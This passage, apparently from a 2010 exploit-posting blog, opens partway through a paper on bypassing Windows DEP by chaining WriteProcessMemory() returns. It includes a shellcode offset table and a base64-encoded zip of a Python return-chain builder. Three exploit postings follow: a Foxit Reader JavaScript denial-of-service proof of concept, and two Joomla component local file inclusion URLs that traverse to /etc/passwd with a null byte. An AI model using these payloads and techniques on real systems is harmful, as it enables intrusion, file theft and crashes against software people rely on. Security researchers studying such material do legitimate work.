    |  shellcode[103-105]        0x7c804d40 -->  0x7c8619ce  |
    |  shellcode[105-106]        0x7c802638 -->  0x7c8619d0  |
    |  shellcode[106-108]        0x7c82c4af -->  0x7c8619d1  |
    |  shellcode[108-111]        0x7c85f0b6 -->  0x7c8619d3  |
    |  shellcode[111-112]        0x7c80178f -->  0x7c8619d6  |
    |  shellcode[112-115]        0x7c804bed -->  0x7c8619d7  |
    |  shellcode[115-116]        0x7c80232d -->  0x7c8619da  |
    |  shellcode[116-121]        0x7c84eac0 -->  0x7c8619db  |
    `-------------------------------------------------------´

  As the scan shows, the shellcode is 121 bytes long, but using multibyte
  sequences allows this code to be built by chaining just 59 calls to
  WriteProcessMemory().

  Step 2 differentiates this from the previous technique of patching
  WriteProcessMemory() itself. In order to avoid accidentally overwriting some
  useful area, and for overall simplicity, it is best pick the address of a
  disposable function or code area from kernel32.dll to overwrite. The example
  used in this paper is the GetTempFileNameA() function at 0x7c861967, as this
  code area has no overlap with WriteProcessMemory(), nor does it overlap with
  any of the shellcode offsets.

  Provided below is a base64 encoded zip of a python script to perform all of
  these steps. It scans for and maps locations of shellcode pieces to the
  function at 0x7c861967. It prints the table displayed above, showing all of
  the mapped locations, as well as writes an output file containing the stack
  frames actually used to perform the return chaining. This can be decoded
  with:

  $ base64 --decode pe_seance-base64.txt > pe_seance.py.zip
  $ unzip pe_seance.py.zip

  --- BEGIN CODE SNIP PE-SEANCE.PY.ZIP ---
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
AAABAAEAUgAAAOcLAAAAAA==
  --- CODE SNIP PE-SEANCE.PY.ZIP ---

  ----------------------=! [      Conclusions      ] !=-----------------------

  WriteProcessMemory() offers DEP-bypassing functionality for multiple
  exploitation scenarios. In the scenario where a decent guess can be made for
  the location of shellcode, this function proves to be a convenient single
  hop solution. Even when the location of shellcode is undetermined, so long
  as stack space is available to chain multiple returns, WriteProcessMemory()
  is very helpful. 

  -----------------=! [      Special Thanks, Greets      ] !=-----------------

        1f4ca6c853366fb33a046255eecdefc8294af29a2686cb615ba72f6478458e0f
        ff90373ee3918440f3b8dda60e1992c63ea0a2f7f16d4c4efd8b8bfd29dced24
        d63468c190831565296272ada04af1ef91d9d79a5edd9f8e3103faf8afff85c7
        8a515aba265ce892546cd06342620b906222bfb6007a74ca5720742839d5aa67
        a9a2f45d3897e197c0439ed973267e2339528eeb8ac2f2c35b088c02f34c5563

  ---------------------=! [      End Of Message      ] !=---------------------

Bookmark It

Hide Sites

Foxit Reader

Georges Kut — Tue, 06 Apr 2010 17:56:45 +0000

Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit

Date: 05/04/10

Author: juza - iamjuza[at]gmail[dot]com

Software Link: http://www.foxitsoftware.com/pdf/reader/

Version: All versions <= 3.2.1.0401 have the same issue

Tested on: Windows XP SP3 x32

Description: Just open the pdf and click in the button!

Greetz: Yux, Wisezilla, GSO, thanks for all!

Code:

function DoS( pdfDate ) {

eval("new Date(" + new Array(Number.NaN,

Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );

}

DoS("DoS");

-------------------------

Bookmark It

Hide Sites

Joomla Component Juke Box com_jukebox Local File Inclusion Vulnerability

Georges Kut — Tue, 06 Apr 2010 17:37:42 +0000

=============================================================================================================

[o] Joomla Component Juke Box Local File Inclusion Vulnerability

Software : com_jukebox version 1.7

Vendor : http://www.jooforge.com/

Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]

Contact : public[dot]antisecurity[dot]org

Home : http://antisecurity.org/

=============================================================================================================

[o] Exploit

http://localhost/[path]/index.php?option=com_jukebox&controller=[LFI]

[o] PoC

http://localhost/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00

=============================================================================================================

[o] Greetz

Angela Zhang stardustmemory aJe martfella pizzyroot Genex

H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti

skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

=============================================================================================================

Bookmark It

Hide Sites

Joomla Component Joomla Flickr com_joomlaflickr Local File Inclusion Vulnerability

Georges Kut — Tue, 06 Apr 2010 17:35:53 +0000

==================================================================================================================

[o] Joomla Component Joomla Flickr Local File Inclusion Vulnerability

Software : com_joomlaflickr version 1.0.x

Vendor : http://aloiroberto.wordpress.com/software/

Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]

Contact : public[dot]antisecurity[dot]org

Home : http://antisecurity.org/

==================================================================================================================

[o] Exploit

http://localhost/[path]/index.php?option=com_joomlaflickr&controller=[LFI]

[o] PoC

http://localhost/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00

==================================================================================================================

[o] Greetz

Angela Zhang stardustmemory aJe martfella pizzyroot Genex

H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti

skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

==================================================================================================================

Bookmark It

Hide Sites